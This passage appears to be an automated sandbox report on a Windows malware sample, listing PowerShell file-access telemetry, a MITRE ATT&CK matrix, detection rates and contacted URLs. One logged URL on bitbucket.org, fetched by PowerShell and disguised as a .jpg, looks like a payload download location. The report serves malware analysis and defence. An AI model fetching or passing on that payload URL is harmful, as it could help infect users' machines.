        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F8BF4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF7E74F8BF4
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F2D70 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF7E74F2D70
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information111
        Scripting        		Valid Accounts2
        Native API        		111
        Scripting        		1
        DLL Side-Loading        		1
        Obfuscated Files or Information        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		1
        Software Packing        		LSASS Memory2
        File and Directory Discovery        		Remote Desktop ProtocolData from Removable Media21
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        Command and Scripting Interpreter        		1
        Registry Run Keys / Startup Folder        		11
        Process Injection        		1
        Timestomp        		Security Account Manager16
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        PowerShell        		Login Hook1
        Registry Run Keys / Startup Folder        		1
        DLL Side-Loading        		NTDS1
        Security Software Discovery        		Distributed Component Object ModelInput Capture4
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
        Virtualization/Sandbox Evasion        		LSA Secrets1
        Process Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Access Token Manipulation        		Cached Domain Credentials21
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Process Injection        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        00wVZ1NU5b.exe16%ReversingLabs
        00wVZ1NU5b.exe17%VirustotalBrowse

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://preferences.atlassian.com0%Avira URL Cloudsafe
        https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net0%Avira URL Cloudsafe
        https://bitbucket.status.atlassian.com/0%Avira URL Cloudsafe
        https://atlassianblog.wpuser.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        bitbucket.org
        		185.166.143.49
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113false
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://bitbucket.org/dfghd/fgd/downloads/tesbpowershell.exe, 00000007.00000002.2200418834.00000218C3171000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://admin.atlassian.compowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://aka.ms/pscore6powershell.exe, 00000005.00000002.2211178390.000001DB2C691000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://api.bitbucket.orgpowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://go.microspowershell.exe, 00000007.00000002.2175735528.00000218AB8EE000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/css/entry/adpowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://preferences.atlassian.compowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/img/logos/bipowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.atlassian.com/try/cloud/signup?bundle=bitbucketpowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://remote-app-switcher.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://bitbucket.status.atlassian.com/powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://contoso.com/powershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/css/entry/appowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/css/entry/vepowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/img/default_powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://id.atlassian.com/profile/rest/profile&quot;powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://aui-cdn.atlassian.com/powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
